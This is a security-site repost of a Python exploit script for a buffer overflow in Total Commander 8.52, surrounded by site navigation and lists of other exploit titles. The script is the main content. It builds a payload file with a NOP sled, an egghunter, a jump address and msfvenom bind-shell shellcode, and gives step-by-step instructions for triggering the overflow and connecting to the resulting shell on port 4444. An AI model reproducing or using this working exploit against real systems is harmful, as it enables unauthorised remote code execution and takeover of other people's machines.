首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛

当前位置：主页>安全文章>文章资料>Exploits>文章内容 Total Commander 8.52 - Buffer Overflow 来源：vfocus.net 作者：VIKRAMADITYA 发布时间：2015-09-21   #!/usr/bin/python # EXPLOIT TITLE: Total Commander 8.52 Buffer Overflow # AUTHOR: VIKRAMADITYA "-OPTIMUS" # Credits: Un_N0n # Date of Testing: 19th September 2015 # Download Link : http://tcmd852.s3-us-west-1.amazonaws.com/tc852x32_b1.exe # Tested On : Windows XP Service Pack 2 # Steps to Exploit # Step 1: Execute this python script # Step 2: This script will create a file called time.txt # Step 3: Copy the contents of time.txt file # Step 4: Now open Total Commander 8.52 # Step 5: Go To file > Change Attributes. # Step 6: In time field paste the contents of time.txt # Step 7: After 5 seconds connect to the target at port 4444 with ncat/nc file = open('time.txt' , 'w');   buffer = "\x90"*190 buffer += "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x52\x30\x63\x58\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7" # Egghunter looking for R0cX R0cX   buffer += "\x90"*(265- len(buffer))   buffer += "\x47\x47\xf7\x75"                                                                                                    #75F74747   FFE0             JMP EAX   # bad characters - \x00\x0a\x0d # msfvenom -p windows/shell_bind_tcp -f c  -b '\x00\x0a\x0d'   buffer += "R0cX" + "R0cX" + ("\xbf\x46\xeb\xb1\xe7\xda\xc5\xd9\x74\x24\xf4\x5d\x29\xc9\xb1" "\x53\x31\x7d\x12\x83\xc5\x04\x03\x3b\xe5\x53\x12\x3f\x11\x11" "\xdd\xbf\xe2\x76\x57\x5a\xd3\xb6\x03\x2f\x44\x07\x47\x7d\x69" "\xec\x05\x95\xfa\x80\x81\x9a\x4b\x2e\xf4\x95\x4c\x03\xc4\xb4" "\xce\x5e\x19\x16\xee\x90\x6c\x57\x37\xcc\x9d\x05\xe0\x9a\x30" "\xb9\x85\xd7\x88\x32\xd5\xf6\x88\xa7\xae\xf9\xb9\x76\xa4\xa3" "\x19\x79\x69\xd8\x13\x61\x6e\xe5\xea\x1a\x44\x91\xec\xca\x94" "\x5a\x42\x33\x19\xa9\x9a\x74\x9e\x52\xe9\x8c\xdc\xef\xea\x4b" "\x9e\x2b\x7e\x4f\x38\xbf\xd8\xab\xb8\x6c\xbe\x38\xb6\xd9\xb4" "\x66\xdb\xdc\x19\x1d\xe7\x55\x9c\xf1\x61\x2d\xbb\xd5\x2a\xf5" "\xa2\x4c\x97\x58\xda\x8e\x78\x04\x7e\xc5\x95\x51\xf3\x84\xf1" "\x96\x3e\x36\x02\xb1\x49\x45\x30\x1e\xe2\xc1\x78\xd7\x2c\x16" "\x7e\xc2\x89\x88\x81\xed\xe9\x81\x45\xb9\xb9\xb9\x6c\xc2\x51" "\x39\x90\x17\xcf\x31\x37\xc8\xf2\xbc\x87\xb8\xb2\x6e\x60\xd3" "\x3c\x51\x90\xdc\x96\xfa\x39\x21\x19\x15\xe6\xac\xff\x7f\x06" "\xf9\xa8\x17\xe4\xde\x60\x80\x17\x35\xd9\x26\x5f\x5f\xde\x49" "\x60\x75\x48\xdd\xeb\x9a\x4c\xfc\xeb\xb6\xe4\x69\x7b\x4c\x65" "\xd8\x1d\x51\xac\x8a\xbe\xc0\x2b\x4a\xc8\xf8\xe3\x1d\x9d\xcf" "\xfd\xcb\x33\x69\x54\xe9\xc9\xef\x9f\xa9\x15\xcc\x1e\x30\xdb" "\x68\x05\x22\x25\x70\x01\x16\xf9\x27\xdf\xc0\xbf\x91\x91\xba" "\x69\x4d\x78\x2a\xef\xbd\xbb\x2c\xf0\xeb\x4d\xd0\x41\x42\x08" "\xef\x6e\x02\x9c\x88\x92\xb2\x63\x43\x17\xc2\x29\xc9\x3e\x4b" "\xf4\x98\x02\x16\x07\x77\x40\x2f\x84\x7d\x39\xd4\x94\xf4\x3c" "\x90\x12\xe5\x4c\x89\xf6\x09\xe2\xaa\xd2")   file.write(buffer)   file.close()   [推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]   匿名评论 评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。  §最新评论：

热点文章 ·CVE-2012-0217 Intel sysret exp ·Linux Kernel 2.6.32 Local Root ·Array Networks vxAG / xAPV Pri ·Novell NetIQ Privileged User M ·Array Networks vAPV / vxAG Cod ·Excel SLYK Format Parsing Buff ·PhpInclude.Worm - PHP Scripts ·Apache 2.2.0 - 2.2.11 Remote e ·VideoScript 3.0 <= 4.0.1.50 Of ·Yahoo! Messenger Webcam 8.1 Ac ·Family Connections <= 1.8.2 Re ·Joomla Component EasyBook 1.1   相关文章 ·Total Commander 8.52 - Buffer ·IntelBras WRN 340 Unauthentica ·Wireshark 1.12.7 - Division by ·Konica Minolta FTP Utility 1.0 ·Konica Minolta FTP Utility 1.0 ·w3tw0rk / Pitbul IRC Bot Remot ·Android libstagefright - Integ ·SMF (Simple Machine Forum) <= ·VBox Satellite Express 2.3.17. ·WinRar 5.21 - SFX OLE Command ·IKEView R60 - Buffer Overflow ·WinRaR SFX Remote Code Executi   推荐广告

CopyRight © 2002-2022 VFocuS.Net All Rights Reserved